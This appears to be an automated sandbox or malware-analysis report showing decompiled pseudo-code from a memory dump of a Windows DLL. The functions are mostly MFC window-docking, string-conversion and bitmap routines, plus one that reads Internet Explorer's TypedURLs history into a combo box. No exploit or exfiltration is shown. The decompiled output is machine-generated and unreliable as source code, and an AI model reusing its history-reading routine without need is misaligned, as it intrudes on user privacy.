Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
API String ID: 2102423945-455206835
Opcode ID: 0b33af8860c1e96616344521b35d342a9092fb61e19e70887b7ccde3d656a65c
Instruction ID: ae7519b7e9fff21c7fcf346fbdda07f27d0c870b8d6725134bba24a6d6b8b266
Opcode Fuzzy Hash: 0b33af8860c1e96616344521b35d342a9092fb61e19e70887b7ccde3d656a65c
Instruction Fuzzy Hash: F4910175C00209AADB84CFE4D485BDEBBF8EF48384F118169FD09EA185E774DA85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10020CB9, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 209
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E10020CB9(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				signed int _v8;
				char _v268;
				RECT* _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				signed int _v300;
				struct tagRECT _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t71;
				signed char _t79;
				signed int _t84;
				signed int _t89;
				signed int _t91;
				signed int _t99;
				signed int _t114;
				intOrPtr _t128;
				void* _t129;
				intOrPtr _t136;
				void* _t151;
				signed int _t153;
				void* _t154;
				intOrPtr _t157;
				void* _t158;
				signed int _t163;

				_t151 = __edx;
				_t130 = __ecx;
				_t161 = _t163;
				_t71 =  *0x1006d940; // 0xc2bf211
				_v8 = _t71 ^ _t163;
				_t157 = _a4;
				_t128 = __ecx;
				_t153 = 0;
				_v276 = _t157;
				_v272 = _a8;
				_t167 = __ecx;
				if(__ecx == 0) {
					L2:
					E1000A5CD(_t128, _t130, _t153, _t157, _t167);
				}
				if(_t157 == _t153) {
					goto L2;
				}
				_t76 = GetWindowRect( *(_t157 + 0x20),  &_v316);
				if( *((intOrPtr*)(_t157 + 0x90)) != _t128 || _v272 != _t153 && EqualRect( &_v316, _v272) == 0) {
					if( *((intOrPtr*)(_t128 + 0x98)) != _t153 && ( *(_t157 + 0x88) & 0x00000040) != 0) {
						 *(_t128 + 0x84) =  *(_t128 + 0x84) | 0x00000040;
					}
					 *(_t128 + 0x84) =  *(_t128 + 0x84) & 0xfffffff9;
					_t79 =  *(_t157 + 0x84) & 0x00000006 |  *(_t128 + 0x84);
					 *(_t128 + 0x84) = _t79;
					_t175 = _t79 & 0x00000040;
					if((_t79 & 0x00000040) == 0) {
						_push(0x104);
						_push( &_v268);
						E10012880(_t128, _t157, _t153, _t157, _t175);
						_t27 = _t128 + 0x20; // 0x6d5b2dc8
						E10027012(_t157, _t151,  *_t27,  &_v268);
					}
					_t84 = ( *(_t157 + 0x84) ^  *(_t128 + 0x84)) & 0x0000f000 ^  *(_t157 + 0x84) | 0x00000f00;
					if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
						_t85 = _t84 & 0xfffffffe;
						__eflags = _t84 & 0xfffffffe;
					} else {
						_t85 = _t84 | 0x00000001;
					}
					E10012DDA(_t157, _t85);
					_v296 = _t153;
					if( *((intOrPtr*)(_t157 + 0x90)) != _t128 && IsWindowVisible( *(_t157 + 0x20)) != 0) {
						E1001254C(_t157, _t153, _t153, _t153, _t153, _t153, 0x97);
						_v296 = 1;
					}
					_v300 = _v300 | 0xffffffff;
					if(_v272 == _t153) {
						_t59 = _t128 + 0x9c; // 0x1006f0f4
						E1001FEF5(_t59, _t157);
						_t60 = _t128 + 0x9c; // 0x1006f0f4
						E1001FEF5(_t60, _t153);
						_t89 =  *0x10094534; // 0x2
						_t91 =  *0x10094530; // 0x2
						_t135 = _t157;
						E1001254C(_t157, _t153,  ~_t91,  ~_t89, _t153, _t153, 0x115);
					} else {
						E1001F3CE( &_v292, _v272);
						E1000AF3F(_t128,  &_v292);
						asm("cdq");
						asm("cdq");
						_push((_v280 - _v288 - _t151 >> 1) + _v288);
						_push((_v284 - _v292 - _t151 >> 1) + _v292);
						_push(_v276);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t114 = E100201AF(_t128);
						_t135 = _v276;
						_v300 = _t114;
						E1001254C(_v276, 0, _v292, _v288, _v284 - _v292, _v280 - _v288, 0x114);
						_t157 = _v276;
						_t153 = 0;
					}
					if(E1000EBE9(_t128, _t135, GetParent( *(_t157 + 0x20))) != _t128) {
						E1001FF29(_t157, _t128);
					}
					_t136 =  *((intOrPtr*)(_t157 + 0x90));
					if(_t136 != _t128) {
						__eflags = _t136 - _t153;
						if(_t136 != _t153) {
							__eflags =  *((intOrPtr*)(_t128 + 0x98)) - _t153;
							if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
								L29:
								_t99 = 0;
								__eflags = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t136 + 0x98)) - _t153;
								if( *((intOrPtr*)(_t136 + 0x98)) != _t153) {
									goto L29;
								} else {
									_t99 = 1;
								}
							}
							_push(_t99);
							_push(0xffffffff);
							goto L31;
						}
					} else {
						_push(_t153);
						_push(_v300);
						L31:
						_push(_t157);
						E1002057F(_t136, _t153);
					}
					 *((intOrPtr*)(_t157 + 0x90)) = _t128;
					if(_v296 != _t153) {
						E1001254C(_t157, _t153, _t153, _t153, _t153, _t153, 0x57);
					}
					E10020516(_t128, _t128, _t157);
					 *(E1002228A(_t128) + 0xe4) =  *(_t76 + 0xe4) | 0x0000000c;
				}
				_pop(_t154);
				_pop(_t158);
				_pop(_t129);
				return E1003F29E(_t76, _t129, _v8 ^ _t161, _t151, _t154, _t158);
			}

0x10020cb9
0x10020cb9
0x10020cbc
0x10020cc4
0x10020ccb
0x10020cd3
0x10020cd7
0x10020cd9
0x10020cdb
0x10020ce1
0x10020ce7
0x10020ce9
0x10020ceb
0x10020ceb
0x10020ceb
0x10020cf2
0x00000000
0x00000000
0x10020cfe
0x10020d0a
0x10020d39
0x10020d44
0x10020d44
0x10020d4b
0x10020d61
0x10020d63
0x10020d69
0x10020d6b
0x10020d6d
0x10020d78
0x10020d7b
0x10020d87
0x10020d8a
0x10020d8a
0x10020da6
0x10020db1
0x10020db8
0x10020db8
0x10020db3
0x10020db3
0x10020db3
0x10020dbe
0x10020dc3
0x10020dcf
0x10020dea
0x10020def
0x10020def
0x10020df9
0x10020e06
0x10020ec1
0x10020ec8
0x10020ece
0x10020ed4
0x10020ed9
0x10020ee8
0x10020ef1
0x10020ef3
0x10020e0c
0x10020e18
0x10020e26
0x10020e3d
0x10020e56
0x10020e61
0x10020e62
0x10020e68
0x10020e6e
0x10020e6f
0x10020e70
0x10020e73
0x10020e74
0x10020e79
0x10020e7f
0x10020eb2
0x10020eb7
0x10020ebd
0x10020ebd
0x10020f09
0x10020f0e
0x10020f0e
0x10020f13
0x10020f1b
0x10020f26
0x10020f28
0x10020f2a
0x10020f30
0x10020f3f
0x10020f3f
0x10020f3f
0x10020f32
0x10020f32
0x10020f38
0x00000000
0x10020f3a
0x10020f3c
0x10020f3c
0x10020f38
0x10020f41
0x10020f42
0x00000000
0x10020f42
0x10020f1d
0x10020f1d
0x10020f1e
0x10020f44
0x10020f44
0x10020f45
0x10020f45
0x10020f4a
0x10020f56
0x10020f61
0x10020f61
0x10020f69
0x10020f75
0x10020f75
0x10020f7f
0x10020f80
0x10020f83
0x10020f8a

APIs

GetWindowRect.USER32 ref: 10020CFE
EqualRect.USER32 ref: 10020D25
IsWindowVisible.USER32(?), ref: 10020DD4

Part of subcall function 1000A5CD: __CxxThrowException@8.LIBCMT ref: 1000A5E3
Part of subcall function 1000A5CD: __EH_prolog3.LIBCMT ref: 1000A5F0

Part of subcall function 100201AF: GetWindowRect.USER32 ref: 1002021B

Part of subcall function 1001254C: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,1000E76C,?,?,1000E76C,00000000,?,?,000000FF,000000FF,00000015), ref: 10012574

GetParent.USER32(?), ref: 10020EFB

Part of subcall function 1001FF29: SetParent.USER32(?,00000000,?,10020F13,1006F058,00000000), ref: 1001FF3C

Strings

@, xrefs: 10020D44

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$Parent$EqualException@8H_prolog3ThrowVisible
String ID: @
API String ID: 2897153062-2766056989
Opcode ID: c3430d222cad8221d4401100f902fbc0c302aed44537813c19a586ee091a684f
Instruction ID: cbb0febf498494f1a7be6bb167ceded445aa27136e5b278617fbecfe9fdd4212
Opcode Fuzzy Hash: c3430d222cad8221d4401100f902fbc0c302aed44537813c19a586ee091a684f
Instruction Fuzzy Hash: 0271A2719006199FCB65DF24DC81BEAB7F6FF49300F5042A9F5999A192DB70AE808F10

Uniqueness

Uniqueness Score: -1.00%

Function 10003C00, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 167
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E10003C00(void* __ebx, int __ecx, void* __edi, CHAR* _a4) {
				int _v8;
				char _v16;
				CHAR* _v24;
				int _v28;
				unsigned int _v32;
				int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				int _v52;
				int _v56;
				int _v60;
				signed int _v80;
				short* _v84;
				int _v88;
				int _v92;
				int _v96;
				void* _v100;
				int _v104;
				int _v108;
				short* _v112;
				void* _v120;
				void* __esi;
				void* __ebp;
				signed int _t81;
				signed int _t82;
				int _t90;
				signed char _t102;
				void* _t104;
				void* _t132;
				void* _t134;
				signed int _t135;
				void* _t136;
				short* _t137;

				_t132 = __edi;
				_t104 = __ebx;
				_t137 = _t136 - 0x60;
				_t81 =  *0x1006d940; // 0xc2bf211
				_t82 = _t81 ^ _t135;
				_v40 = _t82;
				 *[fs:0x0] =  &_v16;
				_v100 = __ecx;
				_v28 = 3;
				_v36 = 0;
				_v8 = 0;
				__imp__#9(_v100, _t82, _t133,  *[fs:0x0], 0x10054678, 0xffffffff);
				 *_v100 = 8;
				_v24 = _a4;
				if(_v24 != 0) {
					_v32 = lstrlenA(_v24) + 1;
					_t125 = _v32;
					_v56 = _t125;
					asm("cdq");
					_t133 = _t125;
					asm("cdq");
					_t90 = E100426F0(_v56, _t125, 2, _t125);
					_v52 = _t90;
					_v48 = _t125;
					__eflags = _v48;
					if(__eflags > 0) {
						L8:
						_v60 = 0x80070057;
						L10:
						__eflags = _v60;
						if(__eflags >= 0) {
							__eflags = _v32 - 0x400;
							if(_v32 > 0x400) {
								L15:
								_t90 = E10006B70(_v32, _t104,  &_v36, _t132, _v32);
								_v84 = _t90;
								L16:
								_v88 = _v32 >> 1;
								_v108 = _v92;
								__eflags = _v84;
								if(__eflags == 0) {
									L18:
									_v108 = 0;
									L22:
									_v104 = _v108;
									L23:
									__imp__#2(_v104);
									 *(_v100 + 8) = _t90;
									_t128 = _v100;
									if( *(_v100 + 8) == 0 && _a4 != 0) {
										 *_v100 = 0xa;
										_t128 = _v100;
										 *(_v100 + 8) = 0x8007000e;
										E10001000(0x8007000e);
									}
									_v44 = _v100;
									_v8 = 0xffffffff;
									while(1) {
										_t142 = _v36;
										if(_v36 == 0) {
											break;
										}
										_v96 = _v36;
										_t128 = _v36;
										_v36 =  *_v36;
										_push(_v96);
										E1003F6C3(_t104, _t132, _t133, _t142);
										_t137 = _t137 + 4;
									}
									 *[fs:0x0] = _v16;
									_pop(_t134);
									__eflags = _v40 ^ _t135;
									return E1003F29E(_v44, _t104, _v40 ^ _t135, _t128, _t132, _t134);
								}
								__eflags = _v24;
								if(__eflags != 0) {
									 *_v84 = 0;
									_t90 = MultiByteToWideChar(_v28, 0, _v24, 0xffffffff, _v84, _v88);
									_v80 = _t90;
									__eflags = _v80;
									if(__eflags != 0) {
										_t90 = _v84;
										_v108 = _t90;
									} else {
										_v108 = 0;
									}
									goto L22;
								}
								goto L18;
							}
							_t102 = E10003A10(_t125, _v32);
							_t137 = _t137 + 4;
							__eflags = _t102 & 0x000000ff;
							if((_t102 & 0x000000ff) == 0) {
								goto L15;
							}
							_t90 = E100421D0(_v32);
							_v112 = _t137;
							_v84 = _v112;
							goto L16;
						}
						_v108 = 0;
						goto L22;
					}
					if(__eflags < 0) {
						L5:
						__eflags = _v48 - 0xffffffff;
						if(__eflags > 0) {
							L9:
							_t125 = _v52;
							_v32 = _v52;
							_v60 = 0;
							goto L10;
						}
						if(__eflags < 0) {
							goto L8;
						}
						__eflags = _v52 - 0x80000000;
						if(_v52 >= 0x80000000) {
							goto L9;
						}
						goto L8;
					}
					__eflags = _v52 - 0x7fffffff;
					if(_v52 > 0x7fffffff) {
						goto L8;
					}
					goto L5;
				}
				_v104 = 0;
				goto L23;
			}

0x10003c00
0x10003c00
0x10003c11
0x10003c14
0x10003c19
0x10003c1b
0x10003c23
0x10003c29
0x10003c2c
0x10003c33
0x10003c3a
0x10003c45
0x10003c53
0x10003c59
0x10003c60
0x10003c7b
0x10003c7e
0x10003c81
0x10003c87
0x10003c8a
0x10003c91
0x10003c96
0x10003c9b
0x10003c9e
0x10003ca1
0x10003ca5
0x10003cc3
0x10003cc3
0x10003cd9
0x10003cd9
0x10003cdd
0x10003ceb
0x10003cf2
0x10003d1a
0x10003d21
0x10003d26
0x10003d29
0x10003d2e
0x10003d34
0x10003d37
0x10003d3b
0x10003d43
0x10003d43
0x10003d86
0x10003d89
0x10003d8c
0x10003d90
0x10003d99
0x10003d9c
0x10003da3
0x10003db3
0x10003db6
0x10003db9
0x10003dc5
0x10003dc5
0x10003dcd
0x10003dd0
0x10003dd7
0x10003dd7
0x10003ddb
0x00000000
0x00000000
0x10003de0
0x10003de3
0x10003de8
0x10003dee
0x10003def
0x10003df4
0x10003df4
0x10003e02
0x10003e0a
0x10003e0e
0x10003e18
0x10003e18
0x10003d3d
0x10003d41
0x10003d51
0x10003d68
0x10003d6e
0x10003d71
0x10003d75
0x10003d80
0x10003d83
0x10003d77
0x10003d77
0x10003d77
0x00000000
0x10003d75
0x00000000
0x10003d41
0x10003cf8
0x10003cfd
0x10003d03
0x10003d05
0x00000000
0x00000000
0x10003d0a
0x10003d0f
0x10003d15
0x00000000
0x10003d15
0x10003cdf
0x00000000
0x10003cdf
0x10003ca7
0x10003cb2
0x10003cb2
0x10003cb6
0x10003ccc
0x10003ccc
0x10003ccf
0x10003cd2
0x00000000
0x10003cd2
0x10003cb8
0x00000000
0x00000000
0x10003cba
0x10003cc1
0x00000000
0x00000000
0x00000000
0x10003cc1
0x10003ca9
0x10003cb0
0x00000000
0x00000000
0x00000000
0x10003cb0
0x10003c62
0x00000000

APIs

VariantClear.OLEAUT32(?), ref: 10003C45
lstrlenA.KERNEL32(00000000), ref: 10003C72
SysAllocString.OLEAUT32(?), ref: 10003D90

Strings

W, xrefs: 10003CC3

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocClearStringVariantlstrlen
String ID: W
API String ID: 368805218-655174618
Opcode ID: c57354da3c439711d22da7c0378a861881b480f182bb55893518be03f2364538
Instruction ID: 279baf33725c577758f00c6b54e3208175d4ce9ec902626e84838cce6591ac5d
Opcode Fuzzy Hash: c57354da3c439711d22da7c0378a861881b480f182bb55893518be03f2364538
Instruction Fuzzy Hash: 06711574D00319DFEB11CF94D884BAEBBB5FB48350F20821AE419AB394C778A945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 100098CA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E100098CA(void* __edx) {
				signed int _v8;
				void _v136;
				int _v140;
				int _v144;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				unsigned int _t23;
				char* _t35;
				struct HBITMAP__* _t37;
				unsigned int _t40;
				signed short _t42;
				void* _t46;
				int _t47;
				unsigned int _t49;
				void* _t52;
				signed char* _t53;
				void* _t54;
				signed int _t58;
				void* _t59;
				void* _t60;
				signed int _t62;
				void* _t63;
				void* _t64;
				signed int _t66;
				signed int _t68;

				_t52 = __edx;
				_t66 = _t68;
				_t21 =  *0x1006d940; // 0xc2bf211
				_v8 = _t21 ^ _t66;
				_push(_t60);
				_push(_t54);
				_t23 = GetMenuCheckMarkDimensions();
				_t47 = _t23;
				_t40 = _t23 >> 0x10;
				_v144 = _t47;
				_v140 = _t40;
				if(_t47 <= 4) {
					L3:
					E1000A5CD(_t40, _t47, _t54, _t60, _t73);
				} else {
					_t73 = _t40 - 5;
					if(_t40 <= 5) {
						goto L3;
					}
				}
				if(_t47 > 0x20) {
					_t47 = 0x20;
					_v144 = _t47;
				}
				asm("cdq");
				_t62 = _t47 + 0xf >> 4;
				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
				if(_t58 > 0xc) {
					_t58 = 0xc;
				}
				if(_t40 > 0x20) {
					_t40 = 0x20;
					_v140 = _t40;
				}
				E10041630(_t58,  &_v136, 0xff, 0x80);
				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
				_t53 = 0x1005686c;
				_t63 = _t62 + _t62;
				_v148 = 5;
				do {
					_t42 = ( *_t53 & 0x000000ff) << _t58;
					_t53 =  &(_t53[1]);
					_t49 =  !_t42 & 0x0000ffff;
					 *_t35 = _t49 >> 8;
					 *(_t35 + 1) = _t49;
					_t35 = _t35 + _t63;
					_t15 =  &_v148;
					 *_t15 = _v148 - 1;
				} while ( *_t15 != 0);
				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
				_pop(_t59);
				_pop(_t64);
				 *0x10094570 = _t37;
				_pop(_t46);
				if(_t37 == 0) {
					 *0x10094570 = _t37;
				}
				return E1003F29E(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
			}

0x100098ca
0x100098cd
0x100098d5
0x100098dc
0x100098e0
0x100098e1
0x100098e2
0x100098e8
0x100098f1
0x100098f4
0x100098fa
0x10009900
0x10009907
0x10009907
0x10009902
0x10009902
0x10009905
0x00000000
0x00000000
0x10009905
0x1000990f
0x10009913
0x10009914
0x10009914
0x1000991d
0x10009923
0x10009931
0x10009936
0x1000993a
0x1000993a
0x1000993e
0x10009942
0x10009943
0x10009943
0x1000995a
0x1000996a
0x10009971
0x10009976
0x10009978
0x10009982
0x10009988
0x1000998b
0x1000998f
0x10009997
0x10009999
0x1000999c
0x1000999e
0x1000999e
0x1000999e
0x100099bd
0x100099c3
0x100099c4
0x100099c5
0x100099ca
0x100099cd
0x100099db
0x100099db
0x100099eb

APIs

GetMenuCheckMarkDimensions.USER32 ref: 100098E2
_memset.LIBCMT ref: 1000995A
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100099BD
LoadBitmapA.USER32 ref: 100099D5

Strings

, xrefs: 1000993B

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 5f8a6d2ffc51b4c2bd970b84243a09645143b69c0bbeba1f7f3c533788965100
Instruction ID: 756365eb590919aad8d322e9bdd5b27b2e1c5efd6e95af7861410b1fa2006fcb
Opcode Fuzzy Hash: 5f8a6d2ffc51b4c2bd970b84243a09645143b69c0bbeba1f7f3c533788965100
Instruction Fuzzy Hash: 79312771A002259FFB10CF28DCC5BA977F4FB44790F4540AAE549D7281DF709D848B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C1F5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1000C1F5(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E1000C040() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E10042287(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x10094128(_a4, _a8);
			}

0x1000c204
0x1000c21d
0x1000c288
0x1000c288
0x1000c28a
0x00000000
0x1000c28b
0x1000c21f
0x1000c226
0x00000000
0x1000c23f
0x1000c240
0x1000c243
0x1000c251
0x1000c254
0x1000c25c
0x1000c25d
0x1000c25e
0x1000c25f
0x1000c266
0x1000c269
0x1000c26d
0x1000c27c
0x1000c281
0x1000c284
0x00000000
0x1000c284
0x1000c226
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000C235
GetSystemMetrics.USER32 ref: 1000C24D
GetSystemMetrics.USER32 ref: 1000C254

Strings

B, xrefs: 1000C214
DISPLAY, xrefs: 1000C271

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 12983458e05fd54174e3c7f474bccebc579640c271225de094b8691b6031943f
Instruction ID: 256afb5b734a99185af2281b313d6e860a42771305d3424476369d300d2957ac
Opcode Fuzzy Hash: 12983458e05fd54174e3c7f474bccebc579640c271225de094b8691b6031943f
Instruction Fuzzy Hash: 9311A771641339ABEB51DFA48C84E5B7BA8EF097D0F414161FD05AF049DA71D904CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 10001470, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001470(intOrPtr __ecx) {
				int _v8;
				signed int _v12;
				void* _v524;
				long _v528;
				char _v1044;
				int _v1048;
				void* _v1052;
				int _v1056;
				int _v1060;
				intOrPtr _v1064;
				int _v1068;
				signed int _t27;
				void* _t39;
				void* _t51;
				void* _t52;
				signed int _t53;

				_t27 =  *0x1006d940; // 0xc2bf211
				_v12 = _t27 ^ _t53;
				_v1064 = __ecx;
				_v1048 = 0;
				_v528 = 0;
				if(RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Internet Explorer\\TypedURLs", 0, 1,  &_v1052) == 0) {
					while(_v528 == 0) {
						_v1060 = 0x200;
						_v1056 = 0x200;
						_v1068 = _v1048;
						_t48 = _v1052;
						_v528 = RegEnumValueA(_v1052, _v1068,  &_v1044,  &_v1060, 0,  &_v8,  &_v524,  &_v1056);
						_v1048 = _v1048 + 1;
						if(_v528 == 0) {
							_t48 = _v1064;
							SendMessageA( *(_v1064 + 0x20), 0x143, 0,  &_v524);
						}
					}
					_t30 = RegCloseKey(_v1052);
				}
				return E1003F29E(_t30, _t39, _v12 ^ _t53, _t48, _t51, _t52);
			}

0x10001479
0x10001480
0x10001483
0x10001489
0x10001493
0x100014ba
0x100014c0
0x100014cd
0x100014d7
0x100014e7
0x10001516
0x10001523
0x10001532
0x1000153f
0x1000154f
0x10001559
0x10001559
0x1000155f
0x1000156b
0x1000156b
0x1000157e

APIs

RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00000001,?), ref: 100014B2
RegEnumValueA.ADVAPI32 ref: 1000151D
SendMessageA.USER32(?,00000143,00000000,?), ref: 10001559
RegCloseKey.ADVAPI32(?), ref: 1000156B

Strings

Software\Microsoft\Internet Explorer\TypedURLs, xrefs: 100014A8

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnumMessageOpenSendValue
String ID: Software\Microsoft\Internet Explorer\TypedURLs
API String ID: 3660749947-2557234152
Opcode ID: 4677dc1dbaef1b83e7eed802546a7ad2585de9a3ee2ca0bd55631a2fd8664211
Instruction ID: a430ead61f1df7874f09e9681aea2e3807086ae72e09fd07d507c87990184ac8
Opcode Fuzzy Hash: 4677dc1dbaef1b83e7eed802546a7ad2585de9a3ee2ca0bd55631a2fd8664211
Instruction Fuzzy Hash: 3021FFF5A0122C9BEB64CB54CC89BDAB7B8EB48305F4085D9E609A7281D7745AC48F54

Uniqueness

Uniqueness Score: -1.00%

Function 10015FEE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10015FEE(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E1000CA01(__ecx, __eflags, _t26) == 0) {
					_t10 = E1000F6AD(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E1000D06F(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E100271BC(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
